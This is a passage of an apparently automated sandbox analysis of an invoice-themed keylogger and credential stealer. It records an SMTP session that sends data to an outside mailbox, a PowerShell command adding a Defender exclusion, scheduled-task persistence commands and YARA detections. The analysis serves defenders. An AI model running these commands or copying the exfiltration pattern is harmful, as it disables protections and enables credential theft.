                                                                                          2024-10-17 07:44:51 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-17 07:44:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          SMTP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                          Oct 17, 2024 09:44:57.923410892 CEST58749790208.91.199.223192.168.2.4220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                          Oct 17, 2024 09:44:57.923710108 CEST49790587192.168.2.4208.91.199.223EHLO 226533
                                                                                          Oct 17, 2024 09:44:58.081408024 CEST58749790208.91.199.223192.168.2.4250-us2.outbound.mailhostbox.com
                                                                                          250-PIPELINING
                                                                                          250-SIZE 41648128
                                                                                          250-VRFY
                                                                                          250-ETRN
                                                                                          250-STARTTLS
                                                                                          250-AUTH PLAIN LOGIN
                                                                                          250-AUTH=PLAIN LOGIN
                                                                                          250-ENHANCEDSTATUSCODES
                                                                                          250-8BITMIME
                                                                                          250-DSN
                                                                                          250 CHUNKING
                                                                                          Oct 17, 2024 09:44:58.093862057 CEST49790587192.168.2.4208.91.199.223AUTH login c2VzaWxlYnJ1Y2VAZWxlbWFjdWFlLmNvbQ==
                                                                                          Oct 17, 2024 09:44:58.253971100 CEST58749790208.91.199.223192.168.2.4334 UGFzc3dvcmQ6
                                                                                          Oct 17, 2024 09:44:58.445933104 CEST58749790208.91.199.223192.168.2.4235 2.7.0 Authentication successful
                                                                                          Oct 17, 2024 09:44:58.449783087 CEST49790587192.168.2.4208.91.199.223MAIL FROM:<sesilebruce@elemacuae.com>
                                                                                          Oct 17, 2024 09:44:58.628186941 CEST58749790208.91.199.223192.168.2.4250 2.1.0 Ok
                                                                                          Oct 17, 2024 09:44:58.628372908 CEST49790587192.168.2.4208.91.199.223RCPT TO:<ilguerrii12@gmail.com>
                                                                                          Oct 17, 2024 09:44:58.818130016 CEST58749790208.91.199.223192.168.2.4250 2.1.5 Ok
                                                                                          Oct 17, 2024 09:44:58.818481922 CEST49790587192.168.2.4208.91.199.223DATA
                                                                                          Oct 17, 2024 09:44:58.976402044 CEST58749790208.91.199.223192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                                                                          Oct 17, 2024 09:44:58.977381945 CEST49790587192.168.2.4208.91.199.223.
                                                                                          Oct 17, 2024 09:44:59.270536900 CEST58749790208.91.199.223192.168.2.4250 2.0.0 Ok: queued as B437F5004C5
                                                                                          Oct 17, 2024 09:46:37.329365969 CEST49790587192.168.2.4208.91.199.223QUIT
                                                                                          Oct 17, 2024 09:46:37.494847059 CEST58749790208.91.199.223192.168.2.4221 2.0.0 Bye

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:03:44:35
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"
                                                                                          Imagebase:0x380000
                                                                                          File size:685'568 bytes
                                                                                          MD5 hash:735A7DF205549792227DE19741161BF4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1771143181.00000000037B2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:03:44:37
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"
                                                                                          Imagebase:0xc40000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:03:44:37
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:03:44:39
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff693ab0000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:03:44:40
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp5F82.tmp"
                                                                                          Imagebase:0xd00000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:03:44:40
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:03:44:40
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"
                                                                                          Imagebase:0x140000
                                                                                          File size:685'568 bytes
                                                                                          MD5 hash:735A7DF205549792227DE19741161BF4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:8
                                                                                          Start time:03:44:40
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"
                                                                                          Imagebase:0x420000
                                                                                          File size:685'568 bytes
                                                                                          MD5 hash:735A7DF205549792227DE19741161BF4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:9
                                                                                          Start time:03:44:40
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe"
                                                                                          Imagebase:0x4d0000
                                                                                          File size:685'568 bytes
                                                                                          MD5 hash:735A7DF205549792227DE19741161BF4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4178805615.0000000002871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.4178805615.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.4178805615.0000000002974000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:10
                                                                                          Start time:03:44:42
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          Imagebase:0x40000
                                                                                          File size:685'568 bytes
                                                                                          MD5 hash:735A7DF205549792227DE19741161BF4
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                          • Detection: 66%, ReversingLabs
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:11
                                                                                          Start time:03:44:44
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vrhZELiHpiub" /XML "C:\Users\user\AppData\Local\Temp\tmp6EA5.tmp"
                                                                                          Imagebase:0xd00000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:12
                                                                                          Start time:03:44:44
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:13
                                                                                          Start time:03:44:44
                                                                                          Start date:17/10/2024
                                                                                          Path:C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe"
                                                                                          Imagebase:0x720000
                                                                                          File size:685'568 bytes
                                                                                          MD5 hash:735A7DF205549792227DE19741161BF4
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.4175064237.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.4179084969.0000000002C32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.4179084969.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.4175064237.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:11.9%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:3.2%
                                                                                            Total number of Nodes:555
                                                                                            Total number of Limit Nodes:41
                                                                                            execution_graph 70160 53ce97e 70161 53ce98e 70160->70161 70168 7271798 70161->70168 70173 72717a8 70161->70173 70162 53ce9c1 70164 72717a8 2 API calls 70162->70164 70165 7271798 2 API calls 70162->70165 70163 53ced2f 70164->70163 70165->70163 70169 72717a8 70168->70169 70178 7271b30 70169->70178 70182 7271b40 70169->70182 70170 7271849 70170->70162 70174 72717db 70173->70174 70176 7271b30 ResumeThread 70174->70176 70177 7271b40 ResumeThread 70174->70177 70175 7271849 70175->70162 70176->70175 70177->70175 70179 7271b3a 70178->70179 70179->70170 70180 7271be2 ResumeThread 70179->70180 70181 7271c09 70180->70181 70181->70170 70183 7271b60 70182->70183 70183->70170 70184 7271be2 ResumeThread 70183->70184 70185 7271c09 70184->70185 70185->70170 70508 a5d120 70509 a5d166 GetCurrentProcess 70508->70509 70511 a5d1b8 GetCurrentThread 70509->70511 70514 a5d1b1 70509->70514 70512 a5d1f5 GetCurrentProcess 70511->70512 70513 a5d1ee 70511->70513 70515 a5d22b 70512->70515 70513->70512 70514->70511 70516 a5d253 GetCurrentThreadId 70515->70516 70517 a5d284 70516->70517 70186 4de8798 70191 4de87c0 70186->70191 70194 4de87b0 70186->70194 70197 4de875e 70186->70197 70187 4de87ac 70202 4de8898 70191->70202 70195 4de87fe 70194->70195 70196 4de8898 2 API calls 70194->70196 70195->70187 70196->70195 70198 4de8763 70197->70198 70199 4de876a 70198->70199 70201 4de8898 2 API calls 70198->70201 70199->70187 70200 4de87fe 70200->70187 70201->70200 70203 4de88c4 70202->70203 70207 4de2a30 70203->70207 70210 4de2a21 70203->70210 70204 4de87fe 70204->70187 70213 4de058c 70207->70213 70209 4de2a47 70209->70204 70211 4de2a47 70210->70211 70212 4de058c 2 API calls 70210->70212 70211->70204 70212->70211 70214 4de0597 70213->70214 70215 4de0b80 70214->70215 70221 4de8cf0 70214->70221 70229 4de0b91 70214->70229 70233 4de8ce0 70214->70233 70241 4de0ba0 70214->70241 70215->70209 70216 4de0b4a 70216->70209 70223 4de8d17 70221->70223 70222 4de8f56 70224 4de0ba0 KiUserCallbackDispatcher 70222->70224 70223->70222 70226 4de8f35 70223->70226 70225 4de8f69 70224->70225 70225->70216 70227 4de0ba0 KiUserCallbackDispatcher 70226->70227 70228 4de8f4c 70227->70228 70228->70216 70230 4de0bcf 70229->70230 70231 4de0c56 70230->70231 70232 4de0ce1 KiUserCallbackDispatcher 70230->70232 70232->70231 70235 4de8cf0 70233->70235 70234 4de8f56 70236 4de0ba0 KiUserCallbackDispatcher 70234->70236 70235->70234 70238 4de8f35 70235->70238 70237 4de8f69 70236->70237 70237->70216 70239 4de0ba0 KiUserCallbackDispatcher 70238->70239 70240 4de8f4c 70239->70240 70240->70216 70242 4de0bcf 70241->70242 70243 4de0c56 70242->70243 70244 4de0ce1 KiUserCallbackDispatcher 70242->70244 70244->70243 70245 7274e60 70246 7274e6b 70245->70246 70249 7274444 70246->70249 70248 7274e76 70250 727444f 70249->70250 70252 7274ecd 70250->70252 70253 72744fc 70250->70253 70252->70248 70254 7274507 70253->70254 70257 727c09c 70254->70257 70256 727d7a7 70256->70252 70258 727c0a7 70257->70258 70265 727dbc0 70258->70265 70268 72750e8 70258->70268 70260 727d8ea GetCapture 70261 727d92c 70260->70261 70263 727d96d GetActiveWindow 70261->70263 70262 727d873 70262->70260 70262->70265 70264 727d9a4 70263->70264 70264->70265 70272 7373db0 70264->70272 70277 7373da0 70264->70277 70265->70256 70269 7275126 70268->70269 70270 7275130 GetProcessWindowStation 70269->70270 70271 7275158 70269->70271 70270->70271 70271->70262 70273 7373dd6 70272->70273 70274 7373dea 70273->70274 70282 a5de40 70273->70282 70288 a5de50 70273->70288 70274->70265 70278 7373dd6 70277->70278 70279 7373dea 70278->70279 70280 a5de40 2 API calls 70278->70280 70281 a5de50 2 API calls 70278->70281 70279->70265 70280->70279 70281->70279 70283 a5de7e 70282->70283 70285 a5dea7 70283->70285 70287 a5df4f 70283->70287 70294 a5d458 GetFocus 70283->70294 70286 a5df4a KiUserCallbackDispatcher 70285->70286 70285->70287 70286->70287 70289 a5de7e 70288->70289 70291 a5dea7 70289->70291 70293 a5df4f 70289->70293 70295 a5d458 GetFocus 70289->70295 70292 a5df4a KiUserCallbackDispatcher 70291->70292 70291->70293 70292->70293 70294->70285 70295->70291 70574 727f2e0 70575 727f32e EnumThreadWindows 70574->70575 70576 727f324 70574->70576 70577 727f360 70575->70577 70576->70575 70578 a54668 70579 a5467a 70578->70579 70580 a54686 70579->70580 70584 a54781 70579->70584 70589 a53e40 70580->70589 70582 a546b1 70585 a547a5 70584->70585 70593 a54881 70585->70593 70597 a54890 70585->70597 70590 a53e4b 70589->70590 70605 a55c54 70590->70605 70592 a57050 70592->70582 70595 a548b7 70593->70595 70594 a54994 70594->70594 70595->70594 70601 a544c4 70595->70601 70599 a548b7 70597->70599 70598 a54994 70598->70598 70599->70598 70600 a544c4 CreateActCtxA 70599->70600 70600->70598 70602 a55920 CreateActCtxA 70601->70602 70604 a559e3 70602->70604 70606 a55c5f 70605->70606 70609 a55c74 70606->70609 70608 a571dd 70608->70592 70610 a55c7f 70609->70610 70613 a55ca4 70610->70613 70612 a572ba 70612->70608 70614 a55caf 70613->70614 70617 a55cd4 70614->70617 70616 a573ad 70616->70612 70618 a55cdf 70617->70618 70619 a586e9 70618->70619 70621 a5ce49 70618->70621 70619->70616 70622 a5ce79 70621->70622 70623 a5ce9d 70622->70623 70627 a5cff7 70622->70627 70631 a5d008 70622->70631 70635 a5cfc5 70622->70635 70623->70619 70629 a5d015 70627->70629 70628 a5d04f 70628->70623 70629->70628 70639 a5bbc0 70629->70639 70632 a5d015 70631->70632 70633 a5bbc0 3 API calls 70632->70633 70634 a5d04f 70632->70634 70633->70634 70634->70623 70637 a5d039 70635->70637 70636 a5d04f 70636->70623 70637->70636 70638 a5bbc0 3 API calls 70637->70638 70638->70636 70640 a5bbc5 70639->70640 70642 a5dd68 70640->70642 70643 a5d3bc 70640->70643 70642->70642 70644 a5d3c7 70643->70644 70645 a55cd4 3 API calls 70644->70645 70646 a5ddd7 70645->70646 70647 a5dde6 70646->70647 70648 a5de40 2 API calls 70646->70648 70649 a5de50 2 API calls 70646->70649 70647->70642 70648->70647 70649->70647 70117 737b238 PeekMessageW 70118 737b2af 70117->70118 70518 53cedac 70519 53cedbc 70518->70519 70521 72717a8 2 API calls 70519->70521 70522 7271798 2 API calls 70519->70522 70520 53cede3 70521->70520 70522->70520 70650 72761f2 70651 72761f7 70650->70651 70655 7278470 70651->70655 70659 727845f 70651->70659 70652 72764b3 70656 72784b6 70655->70656 70657 72784c4 GetForegroundWindow 70656->70657 70658 72784ec 70657->70658 70658->70652 70660 7278468 70659->70660 70661 72784c4 GetForegroundWindow 70660->70661 70662 72784ec 70661->70662 70662->70652 70663 a5d770 DuplicateHandle 70664 a5d806 70663->70664 70296 b06a650 70297 b069dd8 5 API calls 70296->70297 70299 b06a65f 70296->70299 70297->70299 70298 b06a67e 70302 b06a693 70298->70302 70316 b069dd8 GetKeyState 70298->70316 70299->70298 70308 b06a73f 70299->70308 70312 b06a750 70299->70312 70303 b06a6c5 70304 b069dd8 5 API calls 70305 b06a6e6 70304->70305 70309 b06a75e 70308->70309 70310 b06a769 KiUserCallbackDispatcher 70309->70310 70311 b06a772 70309->70311 70310->70311 70311->70298 70313 b06a75e 70312->70313 70314 b06a772 70313->70314 70315 b06a769 KiUserCallbackDispatcher 70313->70315 70314->70298 70315->70314 70317 b069e38 GetKeyState 70316->70317 70319 b069e7d GetKeyState 70317->70319 70321 b069ec2 GetKeyState 70319->70321 70324 b069f07 GetKeyState 70321->70324 70325 b069f4c 70324->70325 70325->70303 70325->70304 70665 72742f1 70666 7274315 70665->70666 70667 727430c 70665->70667 70670 7274730 70667->70670 70674 7274720 70667->70674 70671 7274750 70670->70671 70672 727479b 70671->70672 70678 727436c 70671->70678 70672->70666 70675 7274730 70674->70675 70676 727479b 70675->70676 70677 727436c KiUserExceptionDispatcher 70675->70677 70676->70666 70677->70676 70679 7274377 70678->70679 70680 7274a62 70679->70680 70682 7274b12 70679->70682 70680->70672 70683 7274b60 KiUserExceptionDispatcher 70682->70683 70685 7274be6 70683->70685 70685->70679 70119 7379b20 70120 7379b32 70119->70120 70121 7379c4d 70120->70121 70124 73727c0 70120->70124 70130 73727b0 70120->70130 70125 7372804 70124->70125 70129 737287e 70124->70129 70126 7372811 GetFocus 70125->70126 70125->70129 70127 7372839 70126->70127 70128 7372873 KiUserCallbackDispatcher 70127->70128 70127->70129 70128->70129 70129->70121 70131 73727b3 70130->70131 70132 7372811 GetFocus 70131->70132 70134 737287e 70131->70134 70133 7372839 70132->70133 70133->70134 70135 7372873 KiUserCallbackDispatcher 70133->70135 70134->70121 70135->70134 70136 7278a30 70137 7278a43 70136->70137 70138 7278a47 70137->70138 70139 7278a9a KiUserCallbackDispatcher 70137->70139 70139->70138 70326 7375d6b 70327 7375d7e 70326->70327 70331 7375f81 70327->70331 70335 7375fa8 70327->70335 70328 7375da1 70332 7375f8a 70331->70332 70333 7375fa9 PostMessageW 70331->70333 70332->70333 70334 7376014 70333->70334 70334->70328 70336 7375fa9 PostMessageW 70335->70336 70337 7376014 70336->70337 70337->70328 70338 4de6280 70339 4de6293 70338->70339 70340 4de62b0 70339->70340 70344 4de6379 70339->70344 70350 4de6388 70339->70350 70341 4de62d4 70346 4de6396 70344->70346 70345 4de63de 70345->70341 70346->70345 70356 7277760 70346->70356 70360 7277730 70346->70360 70347 4de63d9 70347->70341 70352 4de6396 70350->70352 70351 4de63de 70351->70341 70352->70351 70354 7277730 SetWindowTextW 70352->70354 70355 7277760 SetWindowTextW 70352->70355 70353 4de63d9 70353->70341 70354->70353 70355->70353 70357 72777a2 70356->70357 70358 72777a8 SetWindowTextW 70356->70358 70357->70358 70359 72777d9 70358->70359 70359->70347 70361 72777a2 70360->70361 70362 72777a8 SetWindowTextW 70360->70362 70361->70362 70363 72777d9 70362->70363 70363->70347 70523 4de0040 70525 4de006d 70523->70525 70524 4de00bc 70524->70524 70525->70524 70529 4de0207 70525->70529 70534 4de01df 70525->70534 70540 4de0208 70525->70540 70530 4de0213 70529->70530 70545 4de0240 70530->70545 70550 4de023f 70530->70550 70531 4de021c 70531->70524 70535 4de0213 70534->70535 70536 4de01e3 70534->70536 70538 4de023f 2 API calls 70535->70538 70539 4de0240 2 API calls 70535->70539 70536->70524 70537 4de021c 70537->70524 70538->70537 70539->70537 70541 4de0213 70540->70541 70543 4de023f 2 API calls 70541->70543 70544 4de0240 2 API calls 70541->70544 70542 4de021c 70542->70524 70543->70542 70544->70542 70546 4de0265 70545->70546 70555 4de0397 70546->70555 70559 4de0398 70546->70559 70547 4de0275 70547->70531 70551 4de0265 70550->70551 70553 4de0398 GetCurrentThreadId 70551->70553 70554 4de0397 GetCurrentThreadId 70551->70554 70552 4de0275 70552->70531 70553->70552 70554->70552 70556 4de03d5 GetCurrentThreadId 70555->70556 70558 4de040b 70555->70558 70556->70558 70558->70547 70560 4de03d5 GetCurrentThreadId 70559->70560 70562 4de040b 70559->70562 70560->70562 70562->70547 70563 737baa8 DispatchMessageW 70564 737bb14 70563->70564 70686 727e0f8 70687 727e120 70686->70687 70690 727c1dc 70687->70690 70689 727e134 70689->70689 70691 727c1e7 70690->70691 70692 72750e8 GetProcessWindowStation 70691->70692 70693 727e5aa 70691->70693 70692->70693 70694 727e7e1 70693->70694 70696 737ace9 70693->70696 70694->70689 70698 737acfa 70696->70698 70697 737ad22 70697->70694 70698->70697 70699 737b138 WaitMessage 70698->70699 70702 737b2f0 70698->70702 70706 737b2e1 70698->70706 70699->70698 70703 737b334 70702->70703 70704 737b356 GetActiveWindow 70703->70704 70705 737b33d 70703->70705 70704->70705 70705->70698 70707 737b2ed 70706->70707 70708 737b356 GetActiveWindow 70707->70708 70709 737b33d 70707->70709 70708->70709 70709->70698 70565 b0413a0 70566 b04152b 70565->70566 70567 b0413c6 70565->70567 70567->70566 70568 7370c40 PostMessageW 70567->70568 70569 7370c48 PostMessageW 70567->70569 70568->70567 70569->70567 70140 7370c10 70141 7370c20 70140->70141 70145 7370c48 PostMessageW 70141->70145 70147 7370c40 70141->70147 70142 7370c31 70146 7370cb4 70145->70146 70146->70142 70148 7370c43 PostMessageW 70147->70148 70150 7370cb4 70148->70150 70150->70142 70364 7277840 70365 7277885 GetClassInfoW 70364->70365 70367 72778cb 70365->70367 70570 727d78f 70571 727d7a0 70570->70571 70572 727c09c 6 API calls 70571->70572 70573 727d7a7 70572->70573 70710 727e9ce 70713 727e360 70710->70713 70714 727e36b 70713->70714 70717 727f1e0 70714->70717 70715 727e9db 70718 727f23f GetCurrentThreadId 70717->70718 70720 727f285 70718->70720 70720->70715 70368 4de0ab0 70369 4de0ac6 70368->70369 70370 4de058c 2 API calls 70368->70370 70370->70369 70721 737b5d8 KiUserCallbackDispatcher 70722 737b64c 70721->70722 70371 53ced4e 70372 53ced0c 70371->70372 70373 53ced2f 70371->70373 70374 72717a8 2 API calls 70372->70374 70375 7271798 2 API calls 70372->70375 70374->70373 70375->70373 70151 a5ad90 70154 a5ae78 70151->70154 70152 a5ad9f 70155 a5ae22 70154->70155 70157 a5ae82 70154->70157 70155->70152 70156 a5aebc 70156->70152 70157->70156 70158 a5b0c0 GetModuleHandleW 70157->70158 70159 a5b0ed 70158->70159 70159->70152 70723 727a8d0 70724 727a8e6 70723->70724 70725 727a93d 70724->70725 70729 4de6cf8 